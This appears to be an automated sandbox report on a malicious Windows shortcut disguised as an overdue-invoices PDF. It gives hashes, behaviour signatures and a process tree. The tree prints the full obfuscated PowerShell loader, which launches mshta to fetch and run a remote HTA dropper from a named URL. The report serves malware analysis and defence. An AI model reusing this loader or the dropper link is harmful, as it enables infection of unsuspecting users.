Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    17-08-2022 07:11

General

  • Target

    FACTURAS VENCIDAS.pdf.lnk

  • Size

    4KB

  • MD5

    321240e769016fa53af40cb6ab98cc0d

  • SHA1

    44b6143d5ec750d11f38d311622ef849b8ec5178

  • SHA256

    517b9d73ba6d6fd29ef0e008a01b11487c9217e466e17bb073a05412b3932e5b

  • SHA512

    b8189176905d269d0135267ac47ac30f140ab76cb8ae5025250691f99f6b8ae186d05bad3bee3521726d6dc4f14f25cca3235aebcd9a9f56c8b8e93eb52e86dd

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://movilidadvialcolombia.com/envios.hta

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FACTURAS VENCIDAS.pdf.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $RmOQa='oaaviioo.ai:loavstm.nl/daoMcbHhemdihvpTlmttslsc//i'; &(-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])) :\ (-join($RmOQa[(25567-25551),(-5690+5691),(-53183+53195)])); :\ ^* (-join($RmOQa[(-49742+49760),(25567-25551),(-65481+65510),(-31827+31844),(-5690+5691)])); foreach($bxcdxk in @((-7238+7268),(15062-15045),(12459-12442),(60614-60577),(-27262+27278),(-16356+16367),(-59583+59605),(-38422+38444),(4418-4400),(-45458+45458),(-8330+8333),(53548-53544),(31137-31125),(-32813+32817),(10370-10347),(2734-2733),(32919-32896),(-55404+55407),(25253-25249),(-60232+60233),(-22204+22216),(-3617+3644),(-25191+25191),(16991-16979),(-56149+56149),(-64411+64429),(-33829+33857),(25970-25966),(-29913+29914),(28759-28751),(-21336+21363),(29847-29847),(16247-16229),(-50154+50176),(-35833+35864),(-60816+60836),(54974-54971),(-1453+1457),(21056-21056),(30922-30906),(25154-25146),(39267-39237),(54694-54677),(-5241+5242))) {$nxFNKh+= $RmOQa[$bxcdxk]}; ^* $nxFNKh;
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1184
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://movilidadvialcolombia.com/envios.hta
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:980

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1184-93-0x000007FEF3EF0000-0x000007FEF4913000-memory.dmp

    Filesize

    10.1MB

  • memory/1184-95-0x0000000002344000-0x0000000002347000-memory.dmp

    Filesize

    12KB

  • memory/1184-94-0x000007FEF3390000-0x000007FEF3EED000-memory.dmp

    Filesize

    11.4MB

  • memory/1184-97-0x0000000002344000-0x0000000002347000-memory.dmp

    Filesize

    12KB

  • memory/1184-98-0x000000000234B000-0x000000000236A000-memory.dmp

    Filesize

    124KB

  • memory/2040-54-0x000007FEFBB81000-0x000007FEFBB83000-memory.dmp

    Filesize

    8KB